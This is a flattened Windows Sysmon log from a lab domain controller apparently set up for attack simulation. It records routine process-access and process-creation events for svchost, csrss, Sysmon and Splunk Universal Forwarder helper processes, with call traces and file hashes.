13:15:18.367{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004716Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:18.367{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004715Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:18.367{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004714Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:18.367{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004713Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:18.367{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-43E6-6000-0801-000000009A01}4592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004712Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:18.367{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-43E6-6000-0801-000000009A01}4592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004711Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:18.368{08A6967A-43E6-6000-0801-000000009A01}4592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004740Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:19.195{08A6967A-43E7-6000-0901-000000009A01}4684816C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004739Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:19.039{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-43E7-6000-0901-000000009A01}4684C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004738Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:19.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004737Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:19.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004736Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:19.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004735Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:19.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004734Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:19.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004733Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:19.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004732Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:19.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004731Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:19.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004730Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:19.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004729Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:19.039{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-43E7-6000-0901-000000009A01}4684C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004728Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:19.039{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-43E7-6000-0901-000000009A01}4684C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004727Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:19.040{08A6967A-43E7-6000-0901-000000009A01}4684C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004753Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:20.211{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-43E8-6000-0A01-000000009A01}3124C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004752Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:20.211{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004751Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:20.211{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004750Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:20.211{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004749Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:20.211{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004748Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:20.211{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004747Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 